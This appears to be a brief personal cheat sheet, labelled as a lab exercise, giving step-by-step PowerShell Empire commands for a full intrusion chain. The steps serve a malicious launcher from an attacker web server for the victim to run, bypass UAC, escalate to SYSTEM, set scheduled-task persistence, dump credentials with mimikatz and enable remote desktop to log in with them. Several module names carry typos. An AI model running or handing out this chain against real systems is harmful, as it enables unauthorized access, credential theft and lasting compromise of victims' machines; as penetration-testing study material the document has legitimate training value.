Powershell Empire common path

Powershell Empire common path in a lab test environment

./empire

1.) setup a listener
listeners
userlistener http
execute

2.) create a stager
userstager multi/launcher
set Listener http
set OutFile /launcher.ps1

3.) setup web server to server malicious launcher
python -m SimpleHTTPServer 8000

4.) infect victim
have victim pc execute reach to attacker pc, download launcher.ps1, execute

5.) interact with agent
**you should see agent check-in as soon as step #4 above is complete
interact XXXXX
rename victim

6.) see where you are
sysinfo
whoami
pwd
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

7.) if not admin, find weaknesses
usemodule privesc/powerup/allchecks
execute

8.) if not admin, use a weakness (perhaps already admin just need uac bypass) to escalate to admin
usermodule privesc/bypassuac_env
set Listener http
execute

9.) interact with admin agent
** if it works, you should get new agent check-in immediately after step #8 that is admin**
interact XXXX
rename victimAsAdmin

10.) see where you are
whoami
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

11.) if admin, move to SYSTEM
usemodule privesc/getssystem
execute

12.) see where you are
whoami    (should says SYSTEM now)

13.) setup persistence as a scheduled task
usemodule persistence/userland/schtasks
set Listener http
set IdleTime 2
execute

14.) run mimikatz
mimikatz

15.) enumerate credential store
usemodule credentials/enum_cred_store
execute

16.) enable remote desktop
usermodule management/enable_rdp
execute

17.) remote desktop into the victim with credentials found